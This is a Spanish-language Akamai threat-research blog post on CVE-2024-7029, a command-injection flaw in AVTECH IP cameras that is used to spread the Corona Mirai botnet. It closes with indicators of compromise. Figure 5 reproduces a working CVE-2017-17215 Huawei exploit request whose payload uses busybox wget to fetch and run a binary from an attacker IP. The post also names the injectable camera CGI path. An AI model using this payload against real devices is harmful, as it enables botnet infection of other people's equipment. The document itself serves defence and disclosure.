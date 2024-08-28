Preste atención a las vulnerabilidades: la variante Corona de la botnet Mirai se propaga con ataques de día cero
Edición y contribuciones adicionales de Tricia Howard
Editado por Maria Vlasak
Resumen ejecutivo
El equipo de respuesta a incidentes e inteligencia en seguridad de Akamai (SIRT) ha identificado una vulnerabilidad de día cero y una campaña de botnets dirigida a otras vulnerabilidades previamente explotadas.
CVE-2024-7029 (descubierta por Aline Eliovich) es una vulnerabilidad de inyección de comandos que se encuentra en la función de brillo de las cámaras de circuitos cerrados de televisión (CCTV) AVTECH y que permite ejecutar código de forma remota.
Una vez realizada la inyección, la botnet propaga una variante de Mirai con nombres de cadena que hacen referencia al virus COVID-19 y que se remonta a 2020.
Hemos incluido una lista de indicadores de compromiso (IOC) para ayudar en la defensa contra esta amenaza.
Introducción
El SIRT de Akamai participa en varias fuentes de información internas y externas, así como también las supervisa, para garantizar la seguridad de nuestras operaciones y las de nuestros clientes en Internet. Hemos identificado varias amenazas activas a través de nuestra red global de cebos, incluida esta que comentamos: CVE-2024-7029, descubierta por Aline Eliovich.
Esta vulnerabilidad de día cero para ejecutar código de forma remota (RCE) se ha identificado en la función de brillo de las cámaras IP AVTECH y hace posible la inyección de comandos para propagar Mirai en un sistema de destino. Esto se puede realizar de forma remota con privilegios elevados (propietario del proceso en ejecución). En agosto de 2024, la CISA publicó documentación de asesoramiento del sistema de control industrial (ICS) sobre esta vulnerabilidad. En ella se menciona que el ataque carece de complejidad y se hace referencia a la explotación tanto de forma remota como pública y conocida.
La campaña de botnets se dirige a otras vulnerabilidades y no solo a CVE-2024-7029. Entre otras, se incluyen algunas vulnerabilidades de AVTECH, una RCE en Hadoop YARN, CVE-2014-8361 y CVE-2017-17215. Esto pone de manifiesto la preocupante tendencia de los ciberdelincuentes de atacar vulnerabilidades antiguas, probablemente de baja prioridad, que no cuentan con los parches necesarios para defenderse ante estas amenazas.
No se quede atrás y protéjase
Ahora es el mejor momento de ponerse al día con la aplicación de parches, ya que muchas de estas vulnerabilidades se caracterizan por permitir la RCE. Y lo que es peor, al no poder asignarles una CVE, es más complicado realizar un seguimiento del error y, por tanto, poder aplicar los parches necesarios.
En esta entrada de blog, explicaremos el ataque de día cero y su impacto, e incluiremos una lista completa de indicadores de riesgo (IOC) para facilitar la detección o mitigación.
¿Qué es CVE-2024-7029?
En resumen, CVE-2024-7029 es una vulnerabilidad de las cámaras IP AVTECH en la que el argumento "brillo" en el parámetro "action=" permite la inyección de comandos. El atacante que observamos aprovechó esta vulnerabilidad para propagar una variante de Mirai con nombres de cadena que hacen referencia al virus COVID-19.
¿Desde cuándo ha estado esta campaña activa?
La primera campaña activa que detectamos comenzó el 18 de marzo de 2024, pero, según el análisis, la actividad de esta variante se remonta a diciembre de 2023. La prueba de concepto (PoC) de CVE-2024-7029 está disponible desde, al menos, 2019, pero no se le llegó a asignar una CVE hasta agosto de 2024.
¿A qué afecta?
Esta vulnerabilidad de las cámaras IP AVTECH afecta a las versiones de firmware AVM1203 de FullImg-1023-1007-1011-1009. A pesar de que el modelo en cuestión ha estado descatalogado varios años, la CISA afirmó en su documentación de asesoramiento que estos dispositivos se siguen utilizando en todo el mundo (algunas autoridades de transporte y otras entidades de infraestructura importantes los usan).
¿Cómo funciona?
Descubrimos esta vulnerabilidad al examinar los registros señuelo. En la figura 1 se muestra la URL descodificada para facilitar su comprensión.
La vulnerabilidad se encuentra en la función de brillo del archivo /cgi-bin/supervisor/Factory.cgi (Figura 2).
¿Qué podría suceder?
Básicamente, esto era lo que sucedía en los ejemplos de explotación que observamos: Los ciberdelincuentes aprovechan esta vulnerabilidad para ejecutar código de forma remota en un sistema de destino.
En la figura 3 se muestra un ejemplo de un atacante que aprovecha este defecto para descargar y ejecutar un archivo JavaScript a fin de recuperar y lanzar su carga de malware principal. Al igual que ocurre con otras muchas botnets, esta también propaga una variante del malware Mirai en sus objetivos.
En este caso, es probable que la botnet esté utilizando la variante Corona Mirai, que otros proveedores llevan relacionando con el virus COVID-19 desde 2020.
Tras la ejecución, el malware se conecta a un gran número de hosts a través de Telnet en los puertos 23, 2323 y 37215. Además, escribe la cadena "Corona" en la consola de un host infectado (Figura 4).
El análisis estático de las cadenas en los ejemplos de malware muestra la orientación de la ruta /ctrlt/DeviceUpgrade_1 en un intento de aprovechar las vulnerabilidades de los dispositivos Huawei afectados por CVE-2017-17215. Los ejemplos cuentan con dos direcciones IP de comando y control integradas, una de las cuales forma parte del código de vulnerabilidad CVE-2017-17215 (Figura 5).
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"
<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Fig. 5: Código de vulnerabilidad CVE-2017-17215 /ctrlt/DeviceUpgrade_1
La botnet también atacó otras vulnerabilidades, como la ejecución de código de forma remota en Hadoop YARN, CVE-2014-8361 y CVE-2017-17215. Hemos observado que estas vulnerabilidades se han explotado en su entorno natural varias veces con éxito.
Conclusión
Una vulnerabilidad a la que no se le haya asignado una CVE sigue siendo una amenaza para su organización; de hecho, podría ser bastante grave. Los ciberdelincuentes que utilizan estas botnets han estado utilizando otras nuevas o de baja prioridad para propagar malware. CVE-2024-7029 es otro ejemplo en el que se utilizan vulnerabilidades de este tipo, y ahora es una tendencia de ataque cada vez más frecuente según el SIRT.
Existen muchas vulnerabilidades que se explotan públicamente o PoC disponibles que carecen de una asignación formal de CVE y, en algunos casos, los dispositivos siguen sin contar con los parches necesarios. Gestionar las prioridades de la aplicación de parches es una tarea ardua, especialmente cuando no hay parches disponibles para algunas de las amenazas. Si no hay forma de hacer frente a una amenaza, se recomienda retirar el hardware y el software para mitigar los riesgos de seguridad y la probabilidad de recibir sanciones legales.
Información actualizada con Akamai
El SIRT de Akamai seguirá detectando y controlando amenazas como CVE-2024-7029, así como informando al respecto, para garantizar la seguridad de nuestros clientes, empleados y la comunidad de seguridad en general. Para estar al día de las novedades, síganos en las redes sociales o consulte nuestra página de investigación de seguridad.
IoC
Direcciones IPv4
93.123.39[.]72
93.123.39[.]87
93.123.39[.]111
147.78.103[.]177
185.216.70[.]37
94.156.8[.]185
93.123.39[.]173
74.50.81[.]158
94.156.71[.]74
93.123.85[.]213
185.216.70[.]142
45.66.231[.]148
185.216.70[.]79
Hashes SHA256
15a1d52c529d314bb2b5fa8b8bd6c6a496609a283dd0e78e595c929e720d1b5b ("r")
c0ae1eb249705f61d45ca747c91c02a411557a28792f4064c1d647abb580bc10 ("x86")
b0f7ef937d77061515907c54967a44da3701e0d2af143164bbf44bb4fc6f26af ("sh")
e82192fbe00bc7205abe786155bbfc0548f5c6ee9819a581e965526674f3cc57 ("mips")
9e9e481bb448438572c2695469c85f773ddcd952025e45bee33bbfce2531c656 ("r")
f4bf61fc335db4f3e7d7d89b534bc1e6ead66a51938e119ea340fe95039935e3 ("mips")
22553be649f76a060ebbdfd410e295b66803e9c49d23369a726be2c5a25733ab ("sh")
135264de24d499877e95673b9cca737e488042813f41fef7817728a704323fe2 ("r")
6ad5984bc9af7af6962a080bbb1a35bb56e8671c4b9c1d44e88da5a3f6b9aa82 ("r")
947f517d3b833cc046b2ea0540aad199b7777fb03057122fb0b618828abdc212 ("r")
8ac82a770cffbbc8fba73554d7caa117ef6d37ffee468665b95bc406449f91b5 ("r")
5e264cb009c4d84b6180e47b9ceda3af8897b17b88fccc9c2914706d66abd1d1 ("r")
372eefdc4bf9f4a4382db2762fcf9a9db559c9d4fff2ee5f5cf5362418caaa92 ("r")
3995a7e7eb8eeafb0b6da2c3813e61d11993a820d478c87809136de79d8f8280 ("sh")
40d8f662c187b53fd6fdeb70db9eb262b707e557d3fa4e5e4eacaeaa03ac45f2 ("r")
4826b0194fbd924aa57b9c4ab1e017f0f45f547189374b0ea761d415fa4285ff ("x86")
25945c4fe38ed2008f027bd1484b89867b23528c738812d317ddf57f48666b91 ("r")
cfcae524309a220a48327c50bf32bf5ed3aed5698855b5da9f1ae932fb2df90c ("x86")
774947944ea370592a30478bb3f26081799f7d7df975a6735e620d3442e7803b ("x86")
06b1f09a62204472581e6aec381f96014bb6cc3fc1a9cef38bbcfe88bd82e499 ("r")
4f50d318688c80f08eb7fad6f8788cae459c3420b3b9eb566f936edd7a780ae1 ("sh")
c15bbfb85bfd8305fad8cc0e0d06cbe825e1e6fc6d8dbe5a8d1ac4243bd77d0c ("x86")
0a566c39ecbc4107f954cb3e5e240ccaf0018dfac9b5062b4db7971fb3d9f413 ("x86")
2d7351aa765bb2feed9536cc392b2013361c193e99841c5b56591d988bd4b582 ("x86")
5d58f0fa54784e9c90825cba9e2052f691cdcfe85b0796a6379982832563090d ("x86")